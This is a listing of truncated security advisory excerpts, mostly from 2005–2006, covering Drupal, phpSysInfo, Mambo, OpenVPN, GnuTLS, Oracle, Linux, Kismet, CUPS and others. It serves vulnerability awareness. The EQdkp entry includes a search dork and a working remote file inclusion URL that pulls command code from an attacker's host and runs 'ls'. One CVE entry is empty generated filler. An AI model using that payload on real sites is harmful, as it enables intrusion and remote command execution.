drupal -- multiple vulnerabilities

The Drupal team reports: Vulnerability: SQL injection A security vulnerability in the database layer allowed certain queries to be submitted to the database without going through Drupal's query sanitizer. Vulnerability: Execution of arbitrary files Certain -- alas, typical -- configurations of...

FreeBSD : phpSysInfo -- 'register_globals' emulation layer overwrite vulnerability (9c1cea79-548a-11da-b53f-0004614cc33d)

A Secunia Advisory reports : Christopher Kunz has reported a vulnerability in phpSysInfo, which can be exploited by malicious people to manipulate certain information. The vulnerability is caused due to an error in the 'registerglobals' emulation layer where certain arrays used by the system can ...

FreeBSD : mambo -- 'register_globals' emulation layer overwrite vulnerability (ffb82d3a-610f-11da-8823-00123ffe8333)

A Secunia Advisory reports : peter MC tachatte has discovered a vulnerability in Mambo, which can be exploited by malicious people to manipulate certain information and compromise a vulnerable system. The vulnerability is caused due to an error in the 'registerglobals' emulation layer in...

EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion

Title: EQdkp = 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: "powered by EQdkp" Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-05-07...

openvpn207.txt

Hi, There is a flaw well more a stupid design than anything else in OpenVPN 2.0.7 and below in the the Remote Management Interface that allows an attacker to gain complete control because there is NO AUTHENTICATION YES NO AUTHENTICATION AT ALL!. This can be carried out from within the LAN that th...

DEBIAN-CVE-2006-1721

digestmd5.c in the CMU Cyrus Simple Authentication and Security Layer SASL library 2.1.18, and possibly other versions before 2.1.21, allows remote unauthenticated attackers to cause a denial of service segmentation fault via malformed inputs in DIGEST-MD5 negotiation...

[SECURITY] [DSA 986-1] New gnutls11 packages fix arbitrary code execution

-------------------------------------------------------------------------- Debian Security Advisory DSA 986-1 [email protected] http://www.debian.org/security/ Martin Schulze March 6th, 2006 http://www.debian.org/security/faq -...

DSA-986-1 gnutls11 - buffer overflows

Bulletin has no description...

[ Secuobs - Tools release ] BSS (Bluetooth Stack Smasher) fuzzer

Software BSS - Bluetooth Stack Smasher Version 0.6 Location BSS could be downloaded on http://www.secuobs.com/news/05022006-bluetooth10.shtml Credits Pierre Betouin - [email protected] Bug was found on following devices : hcidump, Sony/ericsson K600i/V600i/W800i, Nokia N70 & SAMSUNG E73...

Rookie Edition Expliot the guidelines for the preparation of the PNP the overflow vulnerability analysis+exploit-vulnerability warning-the black bar safety net

A month ago, and chat with friends, talked about now on the network, worms, viruses are increasingly rampant, the year before the“shock wave”, last year's“shock wave”, this year also don't know and out of what? The voice just fell, the one is named Zotob worm has been in a 8 on 1 to 5 November...

Design/Logic Flaw

Unspecified vulnerability in the Net Foundation Layer component of Oracle Database server 8.1.7.4, 9.0.1.5, 9.0.1.5 FIPS, 9.2.0.6, and 10.1.0.4 has unspecified impact and attack vectors, as identified by Oracle Vuln DB08...

CVE-2006-0262

Unspecified vulnerability in the Net Foundation Layer component of Oracle Database server 8.1.7.4, 9.0.1.5, 9.0.1.5 FIPS, 9.2.0.6, and 10.1.0.4 has unspecified impact and attack vectors, as identified by Oracle Vuln DB08...

CVE-2006-0262

Technical details for CVE-2006-0262 are not publicly provided in the supplied documents; no explicit affected versions or remediation are included. Monitor for updates.

Ubuntu 4.10 : linux-source-2.6.8.1 vulnerabilities (USN-95-1)

A remote Denial of Service vulnerability was discovered in the Netfilter IP packet handler. This allowed a remote attacker to crash the machine by sending specially crafted IP packet fragments. CAN-2005-0209 The Netfilter code also contained a memory leak. Certain locally generated packet fragmen...

phpSysInfo < 2.4.1 Multiple Vulnerabilities

The remote host is running phpSysInfo, a PHP application that parses the /proc entries on Linux/Unix systems and displays them in HTML. The installed version of phpSysInfo on the remote host has a design flaw in its globalization layer such that the script's variables can be overwritten independe...

phpSysInfo -- "register_globals" emulation layer overwrite vulnerability

A Secunia Advisory reports: Christopher Kunz has reported a vulnerability in phpSysInfo, which can be exploited by malicious people to manipulate certain information. The vulnerability is caused due to an error in the "registerglobals" emulation layer where certain arrays used by the system can b...

snmpwalk 'scanner'

This plugin runs snmpwalk against the remote machine to find open ports. SPDX-FileCopyrightText: 2004 Michel Arboi Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

security flaw

pamldap and nssldap, when used with OpenLDAP and connecting to a slave using TLS, does not use TLS for the subsequent connection if the client is referred to a master, which may cause a password to be sent in cleartext and allows remote attackers to sniff the password...

Kismet: Multiple vulnerabilities

Background Kismet is an 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system. Description Kismet is vulnerable to a heap overflow when handling pcap captures and to an integer underflow in the CDP protocol dissector. Impact With a specially crafted packet an attacker...

Important: Red Hat Security Advisory: cups security update

Updated CUPS packages that fix a security issue are now available for Red Hat Enterprise Linux. This update has been rated as having important security impact by the Red Hat Security Response Team. The Common UNIX Printing System CUPS provides a portable printing layer for UNIXR operating systems...